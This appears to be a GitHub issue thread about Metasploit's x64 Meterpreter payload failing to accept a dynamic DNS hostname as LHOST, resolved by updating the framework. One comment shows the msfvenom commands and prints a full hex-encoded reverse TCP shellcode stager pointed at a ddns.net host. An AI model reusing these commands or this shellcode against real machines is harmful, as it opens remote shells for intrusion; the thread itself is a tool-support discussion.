### ISSUE TITLE
windows/x64/meterpreter/reverse_tcp_dns unsupport?

### ISSUE THREAD

**Issue by kainpark7894** [rapid7/metasploit-framework#6784]
msfvenom & msfconsole meterpreter payload hex shell code

windows/meterpreter/reverse_tcp_dns ->no-ip dns string possible 

but

windows/x64/meterpreter/reverse_tcp ->no-ip dns string -> the following options failed to validate LHOST -> dns string impossible?

windows/x64/meterpreter/reverse_tcp_dns -> Invalid Payload ->unsupported?

This feature will be added Or do impossible?

![error](https://cloud.githubusercontent.com/assets/18137745/14572154/25dffbcc-0388-11e6-9ba9-5305f2b97c2b.png)

**Comment by join-us** [comment]
Please check the version of **metasploit framework** in kali linux, and update to the latest.

```
root@lab:~# msfconsole -v
Framework Version: 4.11.14-dev
root@lab:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=test.ddns.net LPORT=443 -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
Error: The following options failed to validate: LHOST.
```

When I try to use the latest **dev**, it goes well.
```
metasploit-framework [upstream] ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=test.ddns.net LPORT=443 -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc020001bb7f00000141544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a05415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5
metasploit-framework [upstream] ./msfconsole -v
Framework Version: 4.11.21-dev-92ef8f4
```

----

There is a good idea to let meterpreter support **dynamic dns**.

**Comment by kainpark7894** [comment]
thank you ! no problem  solve

msfupdate

Framework Version: 4.11.20-dev

./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=test.ddns.net LPORT=443 -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
